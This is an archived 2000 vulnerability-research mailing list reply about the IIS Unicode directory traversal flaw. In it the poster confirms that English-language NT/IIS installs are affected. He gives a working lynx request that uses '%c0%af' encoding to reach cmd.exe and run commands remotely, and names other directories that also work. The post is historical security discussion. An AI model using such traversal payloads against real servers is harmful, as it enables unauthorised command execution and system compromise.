Vulnerability Development mailing list archives
Re: IIS and unicode
From: "Robert A. Seace" <ras () SLARTIBARTFAST MAGRATHEA COM>
Date: Wed, 25 Oct 2000 10:49:57 -0400
In the profound words of aliver vilereal:
ok, is it true that the unicode exploit only works under foreign machines = that use 2-byte characters? if so, how can i check (in a http response) = if this is a vulnerable system. i have heard that english systems are = also vulnerable, but require a differnt string to be passed to them, is = this true?
No, it's NOT just foreign versions... I tested an NT machine we have at work (standard US/English NT/IIS install; I'm not sure about versions/patchlevels; I'm not an MS guy, at all), and I was easily able to run arbitrary commands on it... The only char sequence I tried was "%c0%af"... I'm not sure if others might work, as well... Specifically, this worked perfectly (done from a Unix box, of course): lynx -dump 'http://NTServerNameHere/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\' Also, replacing "msadc" with "scripts" or "cgi-bin" works just as well... (Seemingly any valid, accessible subdir off the web root? *shrug*) -- ||========================================================================|| || Rob Seace || URL || ras () magrathea com || || AKA: Agrajag || http://www.magrathea.com/~ras/ || rob () wordstock com || ||========================================================================|| "The secret of healthy hitchhiking is to eat junk food." - TRATEOTU
Current thread:
- IIS and unicode aliver vilereal (Oct 26)
- Re: IIS and unicode Robert A. Seace (Oct 26)
- Re: IIS and unicode Bluefish (P.Magnusson) (Oct 26)
- <Possible follow-ups>
- Re: IIS and unicode Ryan Yagatich (Oct 27)